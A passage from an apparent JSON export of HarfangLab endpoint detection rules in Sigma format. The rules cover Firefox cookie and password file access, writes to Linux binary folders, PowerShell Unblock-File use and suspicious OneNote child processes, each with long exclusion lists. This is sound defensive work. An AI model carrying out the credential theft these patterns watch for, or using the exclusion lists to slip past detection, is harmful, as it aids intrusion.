'/bin/cp'\n ProcessSignatureSigningId: 'com.apple.bzgrep'\n ProcessSigned: 'true'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5c3a5ca6-ffd2-4fe9-af67-71720831dc70",
"rule_name": "Suspicious Read Access to Firefox Sensitive Files",
"rule_description": "Detects a suspicious access to Firefox browser files that hold, for instance, cookies or users passwords.\nAdversaries may steal web application cookies and credentials and use them for lateral movement in websites or inside an organization.\nIt is recommended to verify if the process performing the read operation has legitimate reasons to do so.\n",
"rule_creation_date": "2024-06-18",
"rule_modified_date": "2025-10-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1539",
"attack.t1555.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5c3f0f0f-0082-4863-ba3a-b9b746772135",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.507922Z",
"creation_date": "2026-03-23T11:45:34.093975Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093979Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1036/005/",
"https://attack.mitre.org/techniques/T1554/"
],
"name": "t1036_005_suspicious_write_in_binary_folder_linux.yml",
"content": "title: Suspicious Write in the Binary Folder\nid: 5c3f0f0f-0082-4863-ba3a-b9b746772135\ndescription: |\n Detects a suspicious write to one of the common binary folders (\"/bin/\", \"/sbin\", \"/usr/bin/\", \"/usr/sbin/\").\n Adversaries may try to match the name of a legitimate system binary when creating a malicious executable.\n It is recommended to ensure that the process writing to those directories is a legitimate installer and that the file being installed isn't malicious.\nreferences:\n - https://attack.mitre.org/techniques/T1036/005/\n - https://attack.mitre.org/techniques/T1554/\ndate: 2023/12/15\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036.005\n - attack.persistence\n - attack.t1554\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.Persistence\n - classification.Linux.Behavior.Masquerading\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection_write:\n Kind: 'access'\n Permissions: 'write'\n Path|startswith:\n - '/bin/'\n - '/sbin/'\n - '/usr/bin/'\n - '/usr/sbin/'\n ProcessParentImage|contains: '?'\n\n selection_rename:\n Kind: 'rename'\n TargetPath|startswith:\n - '/bin/'\n - '/sbin/'\n - '/usr/bin/'\n - '/usr/sbin/'\n ProcessParentImage|contains: '?'\n\n # Package Managers\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage: '/usr/bin/apt'\n exclusion_debconf:\n - ProcessCommandLine|contains: '/usr/bin/debconf'\n - ProcessParentCommandLine|contains: '/usr/bin/debconf'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/debconf'\n exclusion_dpkg_postinstall:\n - ProcessCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessParentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessGrandparentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - 'yum update'\n - 'yum upgrade'\n - 'yum install'\n - 'sudo yum update'\n - 'sudo yum upgrade'\n - 'sudo yum install'\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - 'yum update'\n - 'yum upgrade'\n - 'yum install'\n - 'sudo yum update'\n - 'sudo yum upgrade'\n - 'sudo yum install'\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - 'yum update'\n - 'yum upgrade'\n - 'yum install'\n - 'sudo yum update'\n - 'sudo yum upgrade'\n - 'sudo yum install'\n exclusion_dnf:\n - ProcessImage: '/usr/bin/dnf5'\n - ProcessCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? -s /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf-automatic'\n - '/usr/bin/python?.? -s /usr/bin/dnf-automatic'\n - 'dnf update'\n - 'dnf upgrade'\n - 'dnf install'\n - 'sudo dnf update'\n - 'sudo dnf upgrade'\n - 'sudo dnf install'\n - '/usr/bin/python? /usr/bin/dnf-3 '\n - '/usr/bin/python?.? /usr/bin/dnf-3 '\n - '/usr/bin/python? -s /usr/bin/dnf '\n - '/usr/bin/python?.? -s /usr/bin/dnf '\n - '/usr/bin/dnf5 builddep --installroot '\n - ProcessParentCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf-automatic'\n - 'dnf update'\n - 'dnf upgrade'\n - 'dnf install'\n - 'sudo dnf update'\n - 'sudo dnf upgrade'\n - 'sudo dnf install'\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf-automatic'\n - 'dnf update'\n - 'dnf upgrade'\n - 'dnf install'\n - 'sudo dnf update'\n - 'sudo dnf upgrade'\n - 'sudo dnf install'\n exclusion_rpm:\n ProcessImage: '/usr/bin/rpm'\n exclusion_pacman:\n ProcessImage: '/usr/bin/pacman'\n exclusion_snapd:\n - ProcessImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n - ProcessParentImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n - ProcessGrandparentImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n exclusion_packagekitd:\n ProcessImage: '/usr/libexec/packagekitd'\n exclusion_flatpak:\n ProcessImage: '/usr/libexec/flatpak-system-helper'\n exclusion_apk:\n ProcessImage:\n - '/sbin/apk'\n - '/usr/sbin/apk'\n\n exclusion_hurukai:\n ProcessImage: '/opt/hurukai-agent/bin/hurukai'\n\n exclusion_systemd:\n ProcessImage: '/usr/lib/systemd/systemd'\n ProcessCommandLine|startswith: '/sbin/init'\n\n exclusion_usrmerge:\n ProcessCommandLine: '/usr/bin/perl /usr/lib/usrmerge/convert-usrmerge'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_docker:\n - ProcessImage:\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/local/bin/dockerd'\n - '/usr/local/bin/docker-init'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/usr/bin/containerd'\n - '/usr/local/bin/containerd'\n - '/var/lib/rancher/k3s/data/*/bin/containerd'\n - '/var/lib/rancher/rke2/data/*/bin/containerd'\n - '/snap/docker/*/bin/dockerd'\n - '/snap/microk8s/*/bin/containerd'\n - '/usr/bin/dockerd-ce'\n - ProcessAncestors|contains:\n - '/usr/bin/runc|/usr/bin/dockerd|'\n - '/snap/docker/*/bin/runc|/snap/docker/*/bin/dockerd|'\n\n exclusion_podman:\n ProcessImage: '/usr/bin/podman'\n\n exclusion_initramfs:\n - ProcessParentCommandLine|contains:\n - '/sbin/mkinitramfs'\n - '/usr/sbin/mkinitramfs'\n - ProcessGrandparentCommandLine|contains:\n - '/sbin/mkinitramfs'\n - '/usr/sbin/mkinitramfs'\n\n exclusion_kaniko:\n ProcessImage: '/kaniko/executor'\n\n exclusion_oracle_cloud:\n - ProcessParentImage: '/snap/oracle-cloud-agent/*/plugins/unifiedmonitoring/unifiedmonitoring'\n - ProcessGrandparentImage: '/snap/oracle-cloud-agent/*/plugins/unifiedmonitoring/unifiedmonitoring'\n\n exclusion_nagios_xi:\n ProcessParentCommandLine|contains: '/nagiosxi/scripts/manage_services.sh '\n\n exclusion_alternatives:\n ProcessImage:\n - '/usr/sbin/alternatives'\n - '/usr/bin/update-alternatives'\n\n exclusion_ubiquity:\n ProcessCommandLine: '/sbin/init maybe-ubiquity'\n\n exclusion_axway:\n ProcessImage: '/usr/bin/Axway/Automator/PServer/bin/opscmd'\n\n exclusion_crio:\n ProcessImage: '/usr/bin/crio'\n\n exclusion_containerd:\n - ProcessImage: '/usr/bin/containerd'\n - ProcessAncestors|contains: '|/usr/bin/containerd-shim-runc-v2|'\n\n exclusion_gitlab:\n ProcessParentCommandLine: '/bin/bash /opt/gitlab/embedded/bin/symlink_ctl_cmds /opt/gitlab'\n\n exclusion_vtom:\n ProcessParentCommandLine|startswith:\n - 'ksh install_vtom '\n - '/bin/ksh /opt/vtom/abm/'\n\n exclusion_rke2_containerd:\n ProcessImage: '/var/lib/rancher/rke2/data/*/bin/containerd'\n ProcessParentImage: '/usr/local/bin/rke2'\n\n exclusion_rootlesskit:\n # /home//bin/rootlesskit --state-dir=/run/user/1022/dockerd-rootless --net=slirp4netns --mtu=65520 --slirp4netns-sandbox=auto --slirp4netns-seccomp=auto --disable-host-loopback --port-driver=builtin --copy-up=/etc --copy-up=/run --propagation=rslave /home//bin/dockerd-rootless.sh\n - ProcessImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n - ProcessParentImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n\n exclusion_wmware:\n ProcessImage: '/tmp/vmis.*/install/vmware-installer/vmis-launcher'\n\n exclusion_nvidia:\n ProcessImage:\n - '/usr/bin/nvidia-installer'\n - '/tmp/*/nvidia-linux-*/nvidia-installer'\n\n exclusion_rsync:\n # A lot of sysadmin use rsync to backup their systems, which triggers an enormous amount of false positives\n ProcessImage: '/usr/bin/rsync'\n\n exclusion_rubrik:\n Path|startswith: '/usr/bin/rubrik/'\n ProcessImage:\n - '/usr/bin/rubrik/bootstrap_agent_main'\n - '/usr/bin/rubrik/backup_agent_main'\n\n exclusion_qemu:\n ProcessImage: '/usr/bin/qemu-*-static'\n ProcessParentImage: '/usr/bin/qemu-*-static'\n\n exclusion_bitdefender:\n ProcessImage|endswith: '/bitdefender-security-tools/bin/bdsecd'\n ProcessParentImage|endswith: '/systemd'\n\n exclusion_buildah1:\n ProcessCommandLine|startswith: 'storage-untar'\n ProcessParentImage: '/usr/bin/buildah'\n\n exclusion_buildah2:\n - ProcessCommandLine|startswith: 'buildah-in-a-user-namespace'\n - ProcessGrandparentCommandLine|startswith:\n - 'buildah from'\n - 'buildah build'\n - 'buildah commit'\n - ProcessParentCommandLine|startswith:\n - 'buildah from'\n - 'buildah build'\n - 'buildah commit'\n\n exclusion_python_installations:\n ProcessCommandLine|startswith:\n - 'python3 -m pip install'\n - 'python -m pip3 install'\n - 'python3 -m pip3 install'\n - 'python -m pip install'\n - 'python3 -m ensurepip'\n - 'python -m ensurepip'\n - '/usr/bin/python3 /usr/bin/pip install'\n - '/usr/bin/python3 /usr/bin/pip3 install'\n - '/usr/bin/python /usr/bin/pip install'\n - '/usr/bin/python /usr/bin/pip3 install'\n - '/usr/bin/python3 -m /usr/bin/pip install'\n - '/usr/bin/python -m /usr/bin/pip3 install'\n - '/usr/bin/python3 -m /usr/bin/pip3 install'\n - '/usr/bin/python -m /usr/bin/pip install'\n - '/usr/bin/python3 -m pip install'\n - '/usr/bin/python -m pip3 install'\n - '/usr/bin/python3 -m pip3 install'\n - '/usr/bin/python -m pip install'\n - '/usr/bin/python3 -m ensurepip'\n - '/usr/bin/python -m ensurepip'\n\n exclusion_ln:\n ProcessImage: '/usr/bin/ln'\n\n exclusion_convert-usrmerg:\n ProcessParentCommandLine: '/usr/bin/perl /usr/lib/usrmerge/convert-usrmerge'\n\n exclusion_convert2rhel:\n ProcessCommandLine|startswith:\n - '/usr/bin/python2 /bin/convert2rhel '\n - '/usr/bin/python2 /usr/bin/convert2rhel '\n\n exclusion_elastic:\n ProcessCommandLine|contains: '/elastic-agent install --url='\n Path: '/usr/bin/elastic-agent'\n\n exclusion_temp_file:\n - ProcessImage:\n - '/usr/bin/vim'\n - '/usr/bin/vim.basic'\n Path|endswith:\n - '.swp'\n - '.swx'\n - ProcessImage: '/usr/bin/sed'\n Path: '/usr/bin/sed??????'\n - ProcessImage: '/usr/bin/sed'\n TargetPath: '/usr/bin/sed??????'\n\n exclusion_commvault:\n ProcessImage|endswith: '/commvault/.gxsetup/silent_install/install'\n\n exclusion_pum_worker:\n ProcessCommandLine|startswith:\n - '/usr/bin/python? -Estt /usr/local/psa/admin/sbin/pum_worker '\n - '/usr/libexec/platform-python -Estt /usr/local/psa/admin/sbin/pum_worker '\n\n exclusion_microdnf:\n ProcessImage: '/usr/bin/microdnf'\n\n exclusion_touch:\n ProcessImage: '/usr/bin/touch'\n\n exclusion_make:\n - ProcessImage: '/usr/bin/cmake'\n - ProcessAncestors|contains: '|/usr/bin/make|'\n\n exclusion_vmware:\n ProcessCommandLine:\n - '/usr/bin/perl -w ./vmware-install.pl --default'\n - '/usr/bin/perl -w /usr/bin/vmware-config-tools.pl --default --log-answers --rpc-on-end --preserve --installing'\n Path:\n - '/usr/bin/vm-support'\n - '/usr/bin/vmware-uninstall-tools.pl'\n - '/usr/bin/vmware-config-tools.pl'\n - '/sbin/mount.vmhgfs'\n - '/usr/sbin/mount.vmhgfs'\n\n exclusion_plesk:\n ProcessCommandLine|startswith:\n - '/usr/bin/python -Estt /usr/local/psa/bin/yum_install '\n - '/usr/libexec/platform-python -Estt /usr/local/psa/bin/dnf_install '\n\n exclusion_image:\n ProcessImage:\n - '/usr/bin/pamac-daemon'\n - '/opt/saltstack/salt/bin/python*'\n - '/usr/bin/lua'\n - '/usr/bin/install'\n - '/usr/bin/tar'\n - '/usr/sbin/prelink'\n\n exclusion_vim:\n ProcessImage:\n - '/usr/bin/vi'\n - '/usr/bin/vim'\n - '/usr/bin/vim.basic'\n Path|endswith:\n - '.swp'\n - '.swpx'\n\n exclusion_aws:\n ProcessAncestors|contains: '/install_agent|*/aws-replication-installer-init|'\n\n condition: 1 of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5c3f0f0f-0082-4863-ba3a-b9b746772135",
"rule_name": "Suspicious Write in the Binary Folder",
"rule_description": "Detects a suspicious write to one of the common binary folders (\"/bin/\", \"/sbin\", \"/usr/bin/\", \"/usr/sbin/\").\nAdversaries may try to match the name of a legitimate system binary when creating a malicious executable.\nIt is recommended to ensure that the process writing to those directories is a legitimate installer and that the file being installed isn't malicious.\n",
"rule_creation_date": "2023-12-15",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1036.005",
"attack.t1554"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5c6a55b5-b600-4835-83fb-e4aa42b6a014",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621805Z",
"creation_date": "2026-03-23T11:45:34.621807Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621811Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/unblock-file",
"https://www.logpoint.com/en/blog/hunting-and-remediating-blackcat-ransomware/",
"https://attack.mitre.org/techniques/T1553/005/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1553_005_powershell_suspicious_unblock_cmdlet.yml",
"content": "title: Suspicious Unblock-File cmdlet via PowerShell\nid: 5c6a55b5-b600-4835-83fb-e4aa42b6a014\ndescription: |\n Detects the suspicious usage of the Unblock-File PowerShell cmdlet.\n This cmdlet removes the Zone.Identifier alternate data stream from a file.\n This alternate data stream can have a value of 3 indicating that it was downloaded from the internet.\n This technique can be used to unblock PowerShell script files to avoid opening them in protected view.\n It is recommended to investigate the execution chain of the process calling the Unblock-File cmdlet to look for malicious behavior.\nreferences:\n - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/unblock-file\n - https://www.logpoint.com/en/blog/hunting-and-remediating-blackcat-ransomware/\n - https://attack.mitre.org/techniques/T1553/005/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2022/06/14\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1553.005\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: powershell_event\n product: windows\n\ndetection:\n selection:\n PowershellCommand|contains: 'Unblock-File '\n\n exclusion_ixbus:\n ProcessCommandLine: 'Powershell.exe -executionpolicy unrestricted -File ?:\\\\*\\iXBus Serveur\\\\*'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_image:\n ProcessParentImage: '?:\\Program Files (x86)\\DesktopCentral_Agent\\bin\\dctask64.exe'\n\n exclusion_commandline:\n - ProcessCommandLine|contains: '\\Program Files\\ATERA Networks\\AteraAgent\\Packages\\AgentPackageSystemTools\\'\n - ProcessParentCommandLine|contains:\n - '\\Program Files (x86)\\FOG\\FOGService.exe'\n - '\\flutter\\bin\\'\n - '\\sysmgmt\\sd_store\\\\*\\precheck'\n - ProcessGrandparentCommandLine|contains: '\\Windows\\AdminArsenal\\PDQDeployRunner\\'\n\n exclusion_ccm:\n PowershellScriptPath|startswith: '?:\\WINDOWS\\ccmcache\\'\n ProcessAncestors|contains: '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5c6a55b5-b600-4835-83fb-e4aa42b6a014",
"rule_name": "Suspicious Unblock-File cmdlet via PowerShell",
"rule_description": "Detects the suspicious usage of the Unblock-File PowerShell cmdlet.\nThis cmdlet removes the Zone.Identifier alternate data stream from a file.\nThis alternate data stream can have a value of 3 indicating that it was downloaded from the internet.\nThis technique can be used to unblock PowerShell script files to avoid opening them in protected view.\nIt is recommended to investigate the execution chain of the process calling the Unblock-File cmdlet to look for malicious behavior.\n",
"rule_creation_date": "2022-06-14",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1553.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5c90af83-d510-4bab-9999-c5318f2ae93e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073838Z",
"creation_date": "2026-03-23T11:45:34.073840Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073845Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://opalsec.substack.com/p/the-defenders-guide-to-onenote-maldocs",
"https://blog.sevagas.com/IMG/pdf/redteam_with_onenote.pdf",
"https://attack.mitre.org/techniques/T1566/",
"https://attack.mitre.org/techniques/T1204/002/",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_onenote_parent.yml",
"content": "title: Suspicious Process Spawned by Microsoft OneNote\nid: 5c90af83-d510-4bab-9999-c5318f2ae93e\ndescription: |\n Detects a suspicious child process started from the Microsoft OneNote application.\n OneNote has become, since the beginning of the year 2023, a fixture in malware delivery, generally used by tricking an user to click on embedded malicious files (hta, exe, ppt...).\n Other files such as JavaScript (.js) or VisualBasic (.vbe) can be used as well.\n It is recommended to investigate the process spawned by OneNote and other potentially malicious activities on the machine.\nreferences:\n - https://opalsec.substack.com/p/the-defenders-guide-to-onenote-maldocs\n - https://blog.sevagas.com/IMG/pdf/redteam_with_onenote.pdf\n - https://attack.mitre.org/techniques/T1566/\n - https://attack.mitre.org/techniques/T1204/002/\n - https://attack.mitre.org/techniques/T1218/\ndate: 2023/02/06\nmodified: 2025/04/18\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1566\n - attack.execution\n - attack.t1204.002\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Phishing\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\ONENOTE.EXE'\n CurrentDirectory|contains:\n - '\\Exported'\n - '\\onenoteofflinecache_files'\n\n filter_browsers:\n OriginalFileName:\n - 'msedge.exe'\n - 'chrome.exe'\n - 'brave.exe'\n - 'firefox.exe'\n - 'iexplore.exe'\n - 'librewolf.exe'\n - 'chromium.exe'\n - 'safari.exe'\n filter_office:\n OriginalFileName:\n - 'EXCEL.EXE'\n - 'OUTLOOK.EXE'\n - 'FileCoAuth.exe' # Outlook\n - 'ONENOTEM.EXE'\n - 'OneNote.exe'\n - 'WINWORD.EXE'\n - 'POWERPNT.EXE'\n - 'CLVIEW.exe'\n - 'VISIO.EXE'\n filter_pdf_readers:\n - OriginalFileName:\n - 'Acrobat.exe'\n - 'AcroRd32.exe'\n - 'FoxitPDFReader.EXE'\n - 'Foxit Reader.EXE'\n - 'Nitro Pro'\n - 'soda.exe'\n - 'GaaihoDoc.exe'\n - Signature: 'FOXIT SOFTWARE INC.'\n\n exclusion_programfiles:\n Image:\n - '?:\\Program Files\\\\*'\n - '?:\\Program Files (x86)\\\\*'\n\n exclusion_fontview:\n ProcessImage:\n - '?:\\Windows\\System32\\fontview.exe'\n - '?:\\Windows\\SysWOW64\\fontview.exe'\n ProcessSigned: 